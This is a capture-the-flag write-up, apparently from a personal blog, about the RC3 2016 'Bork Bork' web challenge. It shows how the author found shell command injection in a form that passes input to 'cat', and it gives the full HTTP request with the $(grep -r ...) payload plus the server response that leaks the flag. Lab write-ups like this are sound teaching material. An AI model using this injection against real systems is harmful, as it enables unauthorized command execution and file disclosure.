Category: Web

Points: 300

Description:

UPDATE: We have made changes to this challenge to make it (somewhat) stable. If what you were trying before is not working, it's because it was causing a problem for us on the back end. I assure you that what you were doing was not the easiest solution, anyway.

We all love doggos and puppers. Have some more of one of our favorite puppers, Gabe. Bork.

https://ctf.rc3.club:3100/

author:orkulus

Investigation

If you post to /bork and try to grab a random file, say, flag.txt, it prints out an error

cat: borks/flag.txt: No such file or directory?autoplay=1&loop=1

This means it’s taking our input and passing it to “cat”. Can we abuse this to disclose other files? What about chain commands for command injection? It looks like when we try to do something not allowed we get presented with an error page

TFW You Can't Pet Gabe
https://www.youtube.com/embed/3gEWROxlw4o

After some more testing, I found that some commands could be injected while others were being filtered. Note: In an effort to increase stability, eventually even $ methods of injection were filtered out, making my solution incorrect. Doesn’t matter, had flag.

However, I was able to succeed by passing the following:

POST https://ctf.rc3.club:3100/bork HTTP/1.1
Host: ctf.rc3.club:3100
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://ctf.rc3.club:3100/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

bork=$(grep -r '.' -e "RC3")

Which returned:

HTTP/1.1 200 OK
Server: nginx/1.10.0 (Ubuntu)
Date: Sat, 19 Nov 2016 22:20:50 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 416

<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="/static/bork.css">
        <link rel="shortcut icon" href="/static/favicon.ico">
    </head>
    <body>
        <h1>HERE'S YOUR BORK!!!!</h1>
        <iframe width="854" height="480" src="cat: &#39;borks/./bork.txt:RC3-2016-L057d0g3&#39;: No such file or directory?autoplay=1&loop=1" frameborder="0"></iframe>
    </body>
</html>

That looks like a flag to me!

Flag

RC3-2016-L057d0g3

Botch

Security

Recent Posts

Links

Nov 20, 2016 - RC3 CTF : Bork Bork

Investigation

Flag